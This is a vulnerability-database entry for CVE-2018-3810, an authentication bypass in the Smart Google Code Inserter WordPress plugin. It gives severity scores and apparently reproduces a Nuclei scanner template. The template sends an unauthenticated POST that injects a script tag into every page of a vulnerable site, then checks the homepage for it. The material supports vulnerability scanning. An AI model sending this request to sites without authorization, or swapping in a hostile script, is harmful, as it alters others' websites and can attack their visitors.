Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-3810
HistoryMar 10, 2021 - 11:36 a.m.

Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass

2021-03-1011:36:11
ProjectDiscovery
github.com
13
oturia
smart google code inserter
wordpress
authentication bypass
google
exploit-db

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.773

Percentile

98.2%

Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.

id: CVE-2018-3810

info:
  name: Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass
  author: princechaddha
  severity: critical
  description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the affected WordPress site.
  remediation: |
    Update to the latest version of the Oturia WordPress Smart Google Code Inserter plugin (3.5 or higher) to fix the authentication bypass vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/43420
    - https://nvd.nist.gov/vuln/detail/CVE-2018-3810
    - https://wordpress.org/plugins/smart-google-code-inserter/#developers
    - https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.html
    - https://wpvulndb.com/vulnerabilities/8987
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-3810
    cwe-id: CWE-287
    epss-score: 0.792
    epss-percentile: 0.98197
    cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: oturia
    product: smart_google_code_inserter
    framework: wordpress
  tags: cve,cve2018,wordpress,google,edb,oturia

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"

    body: 'sgcgoogleanalytic=<script>console.log("document.domain")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'

    headers:
      Content-Type: application/x-www-form-urlencoded

  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - '<script>console.log("document.domain")</script>'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d0c850fd400436a8e489ad6955acb5a03eebf0d639a244b8a0c8de87f376f98f022100b294a58544858480eefec53c1bb24be8da9f0b86351b02e05f1f471dc2d6ce02:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.773

Percentile

98.2%